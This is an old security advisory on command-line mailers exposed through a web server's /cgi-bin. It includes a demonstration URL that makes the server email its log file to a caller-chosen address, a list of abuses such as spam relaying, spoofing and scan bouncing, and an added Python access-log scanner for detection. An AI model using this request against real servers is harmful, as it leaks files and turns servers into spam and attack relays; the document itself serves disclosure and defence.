Multiple Command Line SMTP Mailers Contain Vulnerabilities
Multiple vulnerabilities have been identified in multiple command line mailers
December 11, 2000
Reported December 12, 2000 by XATO

VERSIONS AFFECTED

DESCRIPTION
Multiple vulnerabilities have been discovered in command-line mailers. The vulnerabilities range from Denial of Service (DoS) attacks to information leakage and the writing and retrieving of unauthorized data.

DEMONSTRATION
If the mailer software is located in the /cgi-bin directory on the Web server, a user can launch it with the following URL:

http://yourserver/cgi-bin/mailer.exe

By adding a "-h" to the URL, as seen below, a user obtains a list of available options built into the mailer:

http://yourserver/cgi-bin/mailer.exe?-h

The following command causes the mailer software to email the malicious user any file specified. In this example, the Web server emails log files.

http://yourserver/cgi-bin/mailer.exe?-f%20[email protected]%20-t%20me@example.com%20-a%20c:logsweb.log

The command-line mailer programs also let malicious users specify the recipient and the sender, letting anyone use the server for unsolicited commercial email (UCE), flooding, mail bombing, resource draining, mail spoofing, and DoS. Other problems include the ability to let INI and log files reside in the same directory as the mailer; override the default settings; modify hidden form variables; exploit debug modes; monitor all mail sent through the server; use the mailer as a bounce point for port scans; and use the mailer as a bounce point for brute-force password attacks.

VENDOR RESPONSE
Check your vendor's Web site for fix and upgrade information.

CREDIT
Discovered by XATO
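
A log check for the request pattern shown under DEMONSTRATION, as an added example that is not part of the original advisory: it scans Web server access-log lines for /cgi-bin requests whose query string carries command-line switches. The log lines are constructed, and the switch meanings in SWITCH_RISK are assumptions inferred from the advisory's example URLs.

```python
import re
from urllib.parse import unquote

# Assumption: switch meanings inferred from the advisory's example URLs.
SWITCH_RISK = {
    "-h": "option listing (information leak)",
    "-a": "file from server disk attached to mail",
    "-t": "caller-chosen recipient",
    "-f": "caller-chosen sender",
}

# Request field of a Common Log Format line: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A switch is a dash plus one letter standing alone as an argument.
SWITCH_RE = re.compile(r"(?:^|\s)(-[A-Za-z])(?=\s|$)")


def switches_in_request(log_line):
    """Return command-line switches found in the query string of a /cgi-bin request."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    if not path.lower().startswith("/cgi-bin/") or not query:
        return []
    # Decode '+' and %20 so the query is split the way the program's argv would be.
    decoded = unquote(query.replace("+", " "))
    return SWITCH_RE.findall(decoded)


def scan(lines):
    """Return (line_number, switches, reasons) for every request carrying switches."""
    findings = []
    for n, line in enumerate(lines, 1):
        found = switches_in_request(line)
        if found:
            reasons = [SWITCH_RISK.get(s, "unrecognized switch") for s in found]
            findings.append((n, found, reasons))
    return findings


# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2000:10:00:01 +0000] "GET /cgi-bin/mailer.exe HTTP/1.0" 200 512',
    '192.0.2.10 - - [12/Dec/2000:10:00:05 +0000] "GET /cgi-bin/mailer.exe?-h HTTP/1.0" 200 2048',
    '192.0.2.10 - - [12/Dec/2000:10:00:09 +0000] "GET /cgi-bin/mailer.exe?-f%20a@example.org%20-t%20b@example.com%20-a%20c:logsweb.log HTTP/1.0" 200 64',
    '198.51.100.7 - - [12/Dec/2000:10:02:00 +0000] "GET /cgi-bin/form.exe?name=Ann&topic=pre-sales HTTP/1.0" 200 300',
]
```

A hit on "-a" together with "-t" is the file-retrieval case from the advisory; ordinary name=value form submissions such as the last sample line are not flagged.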